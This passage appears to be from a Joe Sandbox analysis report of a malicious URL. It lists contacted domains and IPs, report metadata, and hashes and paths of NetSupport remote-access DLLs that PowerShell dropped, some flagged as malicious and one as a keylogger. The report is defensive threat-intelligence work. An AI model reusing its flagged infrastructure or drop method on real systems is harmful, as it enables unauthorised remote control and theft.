                                                                      http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0GAppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://wwww.certigna.fr/autorites/0mAppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://contoso.com/Iconpowershell.exe, 0000001A.00000002.2149775477.00000231711D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://www.anf.es/AC/ANFServerCA.crl0AppInstaller.exe, 0000000E.00000003.1680481341.00000196D5F57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://127.0.0.1client32.exe, client32.exe, 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmp, PCICL32.DLL.26.drfalse
                                                                        • 2%, Virustotal, Browse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://www.globaltrust.info0AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://www.symauth.com/cps0(powershell.exe, 0000001A.00000002.1968531120.0000023162F35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163353000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162D8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162E0E000.00000004.00000800.00020000.00000000.sdmp, HTCTL32.DLL.26.dr, pcicapi.dll.26.dr, PCICHEK.DLL.26.dr, AudioCapture.dll.26.drfalse
                                                                          		high
                                                                          https://github.com/Pester/Pesterpowershell.exe, 00000019.00000002.1941634656.000002B2801BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.00000231613CA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://ac.economia.gob.mx/last.crl0GAppInstaller.exe, 0000000E.00000002.1775764927.00000196D5F9B000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1687786555.00000196D5F9B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0AppInstaller.exe, 0000000E.00000002.1775680653.00000196D5F93000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679968743.00000196D5F91000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.symauth.com/rpa00powershell.exe, 0000001A.00000002.1968531120.0000023162F35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163353000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162D8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162E0E000.00000004.00000800.00020000.00000000.sdmp, HTCTL32.DLL.26.dr, pcicapi.dll.26.dr, PCICHEK.DLL.26.dr, AudioCapture.dll.26.drfalse
                                                                                		high
                                                                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000001A.00000002.1968531120.000002316179B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023161B2E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppAppInstaller.exe, 00000024.00000002.2594809898.000002A99F399000.00000004.00000020.00020000.00000000.sdmp, AppInstallerFullTrustAppServiceClient.exe, 00000026.00000002.2102011848.00000177F3C7D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://crl.oces.trust2408.com/oces.crl0AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    http://certs.oaticerts.com/repository/OATICA2.crlAppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    http://certs.oati.net/repository/OATICA2.crt0AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    http://www.accv.es00AppInstaller.exe, 0000000E.00000002.1775680653.00000196D5F93000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679968743.00000196D5F91000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://crl2.postsignum.cz/crl/psrootqca4.crl01AppInstaller.exe, 0000000E.00000003.1680066554.00000196D5F5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      http://web.ncdc.gov.sa/crl/nrcaparta1.crlAppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      http://www.datev.de/zertifikat-policy-int0AppInstaller.exe, 0000000E.00000003.1687850749.00000196D5FBD000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679946512.00000196D5F7C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://www.acabogacia.org0AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        http://www.firmaprofesional.com/cps0AppInstaller.exe, 0000000E.00000003.1680066554.00000196D5F5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://aka.ms/pscore6powershell.exe, 00000029.00000002.2535977313.000002678C620000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://cdn40.click/bb9c1a14-4e3d-40ab-bcc8-0b84e78255b0-4bed9ff2-0f4e-48fb-92ed-1065fcd85e01powershell.exe, 0000001A.00000002.1968531120.00000231613CA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • 2%, Virustotal, Browse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://crl.securetrust.com/SGCA.crl0AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            http://www.agesic.gub.uy/acrn/acrn.crl0)AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            http://pesterbdd.com/images/Pester.png8powershell.exe, 0000001A.00000002.1968531120.00000231613CA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • 12%, Virustotal, Browse
                                                                                            • Avira URL Cloud: malware
                                                                                            		unknown
                                                                                            http://www.rcsc.lt/repository0AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            https://web.certicamara.com/marco-legal0ZAppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://crl.thawte.com/ThawteTimestampingCA.crl0powershell.exe, 0000001A.00000002.1968531120.000002316309F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162FB9000.00000004.00000800.00020000.00000000.sdmp, PCICL32.DLL.26.dr, TCCTL32.DLL.26.drfalse
                                                                                                		high
                                                                                                http://www.quovadisglobal.com/cps0AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.correo.com.uy/correocert/cps.pdf0AppInstaller.exe, 0000000E.00000003.1680323847.00000196D5361000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  http://www.netsupportschool.com/tutor-assistant.asp11(client32.exe, 00000020.00000002.2593724685.00000000111DC000.00000004.00000001.01000000.00000017.sdmp, PCICL32.DLL.26.drfalse
                                                                                                    		high
                                                                                                    http://certs.oaticerts.com/repository/OATICA2.crt08AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    http://cps.chambersign.org/cps/chambersignroot.html0AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    http://www.anf.es/AC/RC/ocsp0cAppInstaller.exe, 0000000E.00000003.1680481341.00000196D5F57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://www.pci.co.uk/supportclient32.exe, 00000020.00000002.2593724685.00000000111DC000.00000004.00000001.01000000.00000017.sdmp, PCICL32.DLL.26.drfalse
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      http://www.oaticerts.com/repository.AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      http://www.ancert.com/cps0AppInstaller.exe, 0000000E.00000002.1776317770.00000196D6200000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      http://ocsp.accv.es0AppInstaller.exe, 0000000E.00000002.1775680653.00000196D5F93000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679968743.00000196D5F91000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      https://www.wsj.com/xpowershell.exe, 00000019.00000002.1941634656.000002B280472000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://acraiz.icpbrasil.gov.br/LCRacraizv2.crl0AppInstaller.exe, 0000000E.00000003.1680066554.00000196D5F5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        http://www.echoworx.com/ca/root2/cps.pdf0AppInstaller.exe, 0000000E.00000003.1680481341.00000196D5F57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        http://ca.mtin.es/mtin/crl/MTINAutoridadRaiz03AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        http://www.datev.de/zertifikat-policy-std0AppInstaller.exe, 0000000E.00000003.1680066554.00000196D5F5E000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1687850749.00000196D5FBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://www.wsj.com/vicepowershell.exe, 00000019.00000002.2058406283.000002B2F5C65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://acraiz.icpbrasil.gov.br/LCRacraizv1.crl0AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            https://aka.ms/winsvr-2022-pshelp(powershell.exe, 0000001A.00000002.1968531120.000002316227F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0AppInstaller.exe, 0000000E.00000003.1687786555.00000196D5F9B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://crl.defence.gov.au/pki0AppInstaller.exe, 0000000E.00000003.1679946512.00000196D5F7C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                http://www.agesic.gub.uy/acrn/cps_acrn.pdf0AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown

                                                                                                                World Map of Contacted IPs

                                                                                                                • No. of IPs < 25%
                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                • 75% < No. of IPs

                                                                                                                Public IPs

                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                5.8.63.140
                                                                                                                		unknownRussian Federation
                                                                                                                		30475WEHOSTWEBSITES-COMUSfalse
                                                                                                                104.26.12.205
                                                                                                                		api.ipify.orgUnited States
                                                                                                                		13335CLOUDFLARENETUSfalse
                                                                                                                86.104.72.157
                                                                                                                		cdn37.spaceRomania
                                                                                                                		50636TELE-ROM-ASstrAleeaPaciiBlB5Ap16ROtrue
                                                                                                                185.174.102.62
                                                                                                                		unknownUkraine
                                                                                                                		8100ASN-QUADRANET-GLOBALUSfalse
                                                                                                                108.177.122.106
                                                                                                                		www.google.comUnited States
                                                                                                                		15169GOOGLEUSfalse
                                                                                                                239.255.255.250
                                                                                                                		unknownReserved
                                                                                                                		unknownunknownfalse
                                                                                                                103.113.70.37
                                                                                                                		wsj.pmIndia
                                                                                                                		133973NETCONNECTWIFI-ASNetConnectWifiPvtLtdINfalse
                                                                                                                104.26.13.205
                                                                                                                		unknownUnited States
                                                                                                                		13335CLOUDFLARENETUSfalse
                                                                                                                23.133.88.190
                                                                                                                		cdn40.clickReserved
                                                                                                                		394352FASTNET-COMMUNICATIONSCAfalse
                                                                                                                104.26.0.231
                                                                                                                		geo.netsupportsoftware.comUnited States
                                                                                                                		13335CLOUDFLARENETUSfalse

                                                                                                                Private

                                                                                                                IP
                                                                                                                192.168.2.17

                                                                                                                General Information

                                                                                                                Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                Analysis ID:1431705
                                                                                                                Start date and time:2024-04-25 16:57:45 +02:00
                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                Overall analysis duration:0h 10m 48s
                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                Report type:full
                                                                                                                Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                                Sample URL:http://wsj.pm
                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                Number of analysed new started processes analysed:44
                                                                                                                Number of new started drivers analysed:0
                                                                                                                Number of existing processes analysed:0
                                                                                                                Number of existing drivers analysed:0
                                                                                                                Number of injected processes analysed:0
                                                                                                                Technologies:
                                                                                                                • HCA enabled
                                                                                                                • EGA enabled
                                                                                                                • AMSI enabled
                                                                                                                Analysis Mode:default
                                                                                                                Detection:MAL
                                                                                                                Classification:mal100.rans.evad.win@48/139@21/11
                                                                                                                EGA Information:
                                                                                                                • Successful, ratio: 66.7%
                                                                                                                HCA Information:Failed

                                                                                                                Warnings

                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, RuntimeBroker.exe, SIHClient.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                • Excluded IPs from analysis (whitelisted): 64.233.185.94, 108.177.122.139, 108.177.122.100, 108.177.122.101, 108.177.122.113, 108.177.122.102, 108.177.122.138, 108.177.122.84, 34.104.35.123, 64.233.177.95, 74.125.136.95, 142.250.105.95, 64.233.176.95, 142.250.9.95, 172.253.124.95, 172.217.215.95, 64.233.185.95, 142.251.15.95, 108.177.122.95, 74.125.138.95, 173.194.219.95, 142.250.105.94, 104.18.20.226, 64.233.176.113, 64.233.176.138, 64.233.176.100, 64.233.176.101, 64.233.176.102, 64.233.176.139
                                                                                                                • Excluded domains from analysis (whitelisted): www.bing.com, clients1.google.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, clientservices.googleapis.com, ocsp.globalsign.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, login.live.com, evoke-windowsservices-tas.msedge.net, update.googleapis.com, clients.l.google.com
                                                                                                                • Execution Graph export aborted for target PsfLauncher64.exe, PID 720 because it is empty
                                                                                                                • Execution Graph export aborted for target PsfRunDll64.exe, PID 1160 because it is empty
                                                                                                                • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                • Report size getting too big, too many NtOpenKey calls found.
                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                Simulations

                                                                                                                Behavior and APIs

                                                                                                                TimeTypeDescription
                                                                                                                16:59:27API Interceptor152x Sleep call for process: powershell.exe modified
                                                                                                                17:00:15API Interceptor11x Sleep call for process: client32.exe modified

                                                                                                                Joe Sandbox View / Context

                                                                                                                IPs

                                                                                                                No context

                                                                                                                Domains

                                                                                                                No context

                                                                                                                ASNs

                                                                                                                No context

                                                                                                                JA3 Fingerprints

                                                                                                                No context

                                                                                                                Dropped Files

                                                                                                                No context

                                                                                                                Created / dropped Files

                                                                                                                C:\ProgramData\netsupport\client\AudioCapture.dll

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):93560
                                                                                                                Entropy (8bit):6.5461580255883876
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:1536:wrOxDJs/Ksdl0R1dBmhFXxRpP9JNvbnPUGI:3yXlQmhhHp9J9bnPTI
                                                                                                                MD5:4182F37B9BA1FA315268C669B5335DDE
                                                                                                                SHA1:2C13DA0C10638A5200FED99DCDCF0DC77A599073
                                                                                                                SHA-256:A74612AE5234D1A8F1263545400668097F9EB6A01DFB8037BC61CA9CAE82C5B8
                                                                                                                SHA-512:4F22AD5679A844F6ED248BF2594AF94CF2ED1E5C6C5441F0FB4DE766648C17D1641A6CE7C816751F0520A3AE336479C15F3F8B6EBE64A76C38BC28A02FF0F5DC
                                                                                                                Malicious:true
                                                                                                                Yara Hits:
                                                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\netsupport\client\AudioCapture.dll, Author: Joe Security
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Virustotal, Detection: 1%, Browse
                                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                Reputation:low
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*..in.:n.:n.:g.6:|.:g. :".:g.':J.:g.0:i.:n.:5.:g.):i.:g.1:o.:p.7:o.:g.2:o.:Richn.:........PE..L......U...........!.........j.......S............0.................................5f..............................@*..-...."..P....P..X............D..x)...`..4...p...................................@...............@............................text............................... ..`.rdata..m;.......<..................@..@.data........0......................@....rsrc...X....P.......$..............@..@.reloc..T....`.......,..............@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                C:\ProgramData\netsupport\client\HTCTL32.DLL

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):328056
                                                                                                                Entropy (8bit):6.754723001562745
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6144:2ib5YbsXPKXd6ppGpwpbGf30IVFpSzyaHx3/4aY5dUilQpAf84lH0JYBAnM1OK/Y:2ib5YbsXioEgULFpSzya9/lY5SilQCfg
                                                                                                                MD5:2D3B207C8A48148296156E5725426C7F
                                                                                                                SHA1:AD464EB7CF5C19C8A443AB5B590440B32DBC618F
                                                                                                                SHA-256:EDFE2B923BFB5D1088DE1611401F5C35ECE91581E71503A5631647AC51F7D796
                                                                                                                SHA-512:55C791705993B83C9B26A8DBD545D7E149C42EE358ECECE638128EE271E85B4FDBFD6FBAE61D13533BF39AE752144E2CC2C5EDCDA955F18C37A785084DB0860C
                                                                                                                Malicious:true
                                                                                                                Yara Hits:
                                                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\netsupport\client\HTCTL32.DLL, Author: Joe Security
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                • Antivirus: Virustotal, Detection: 3%, Browse
                                                                                                                Reputation:low
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A...A...A.......A...9...A...A..gA....1..A....0.A.......A.......A.......A..Rich.A..........PE..L.....V...........!.................Z.......................................P......=G....@......................... ...k....y..x.......@...............x).......0..................................._..@............................................text............................... ..`.rdata..............................@..@.data....f.......(...v..............@....rsrc...@...........................@..@.reloc..b1.......2..................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                C:\ProgramData\netsupport\client\NSM.LIC

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):259
                                                                                                                Entropy (8bit):5.058986594877512
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6:O/oP54xRPjwxVshvydDKHMoEEjLgpW2MWMf651XZNWYpPM/iooZa8l6i7s:X0R7wxQJjjqW2MWMf65TNBPM/io98l6J
                                                                                                                MD5:1DC87146379E5E3F85FD23B25889AE2A
                                                                                                                SHA1:B750C56C757AD430C9421803649ACF9ACD15A860
                                                                                                                SHA-256:F7D80E323E7D0ED1E3DDD9B5DF08AF23DCECB47A3E289314134D4B76B3ADCAF2
                                                                                                                SHA-512:7861ABE50EEFDF4452E4BAACC4B788895610196B387B70DDEAB7BC70735391ED0A015F47EADA94A368B82F8E5CEDB5A2096E624F4A881FF067937AD159E3562C
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:1200..0xdb3e38e....; NetSupport License File...; Generated on 00:48 - 19/03/2014........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=MGJFFRT466..maxslaves=100000..os2=1..product=10..serial_no=NSM301071..shrink_wrap=0..transport=0..

                                                                                                                C:\ProgramData\netsupport\client\PCICHEK.DLL

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):18808
                                                                                                                Entropy (8bit):6.22028391196942
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:1ANeiOT8Z2b6SoVF6RRHaPrpF3o47jtd3hfwHjvud3hfwx7bjuh:1ANt+E2exrpxTSDuTuih
                                                                                                                MD5:A0B9388C5F18E27266A31F8C5765B263
                                                                                                                SHA1:906F7E94F841D464D4DA144F7C858FA2160E36DB
                                                                                                                SHA-256:313117E723DDA6EA3911FAACD23F4405003FB651C73DE8DEFF10B9EB5B4A058A
                                                                                                                SHA-512:6051A0B22AF135B4433474DC7C6F53FB1C06844D0A30ED596A3C6C80644DF511B023E140C4878867FA2578C79695FAC2EB303AEA87C0ECFC15A4AD264BD0B3CD
                                                                                                                Malicious:true
                                                                                                                Yara Hits:
                                                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\netsupport\client\PCICHEK.DLL, Author: Joe Security
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                • Antivirus: Virustotal, Detection: 1%, Browse
                                                                                                                Reputation:low
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......sv..7.d.7.d.7.d.,...5.d.,...4.d.>o..0.d.7.e...d.,...3.d.,...6.d.,...6.d.,...6.d.Rich7.d.........PE..L...f..U...........!......................... ...............................`............@.........................p"..a.... ..P....@............... ..x)...P......@ ............................................... ..@............................text...$........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                C:\ProgramData\netsupport\client\PCICL32.DLL

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):3710280
                                                                                                                Entropy (8bit):6.518204410536431
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:49152:xOHDe5Yr6tYA4S+DjdwfwBTNZaZQclSpmTIH:xOHDe5YrvS+tBQSEm
                                                                                                                MD5:AD51946B1659ED61B76FF4E599E36683
                                                                                                                SHA1:DFE2439424886E8ACF9FA3FFDE6CAAF7BFDD583E
                                                                                                                SHA-256:07A191254362664B3993479A277199F7EA5EE723B6C25803914EEDB50250ACF4
                                                                                                                SHA-512:6C30E7793F69508F6D9AA6EDCEC6930BA361628EF597E32C218E15D80586F5A86D89FCBEE63A35EAB7B1E0AE26277512F4C1A03DF7912F9B7FF9A9A858CF3962
                                                                                                                Malicious:true
                                                                                                                Yara Hits:
                                                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\ProgramData\netsupport\client\PCICL32.DLL, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\netsupport\client\PCICL32.DLL, Author: Joe Security
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                • Antivirus: Virustotal, Detection: 8%, Browse
                                                                                                                Reputation:low
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........h..........<G.............-..........q............q.....q......-.Q....,.|.....................Rich............PE..L.....U...........!.......... ......].......................................09......9...............................................................8.H.....7.d...................................`...@....................w..`....................text............................... ..`.rdata..............................@..@.data....%..........................@....tls.................p..............@....hhshare.............r..............@....rsrc................t..............@..@.reloc...,....7......V6.............@..B................................................................................................................................................................................................................

                                                                                                                C:\ProgramData\netsupport\client\TCCTL32.DLL

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):391832
                                                                                                                Entropy (8bit):6.788660116314725
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6144:/0pwbUb486Yu0LIFZf4TktH4aY384az44lstAZPVJ4hPueU12jXvbJaS0T9XjJpX:8pwbUb48Ju0LIFZf4Tk2aY3FasNAZtJp
                                                                                                                MD5:405A7BCA024D33D7D6464129C1B58451
                                                                                                                SHA1:22B64E211D96D773C510AC82E7A73F8DEBF4E4CD
                                                                                                                SHA-256:092C3EC01883D3B4B131985B3971F7E2E523252B75F9C2470E0821505C4A3A83
                                                                                                                SHA-512:3C8D4CBF377A8BEB793C93B63D521CCD75167DEC02DA43BB91434CB6B0737CA2D61FA201F2825FD1A0CEAAE768BB53D78F737E7C412AAE83D3CDC748893F31E6
                                                                                                                Malicious:true
                                                                                                                Yara Hits:
                                                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\netsupport\client\TCCTL32.DLL, Author: Joe Security
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                • Antivirus: Virustotal, Detection: 1%, Browse
                                                                                                                Reputation:low
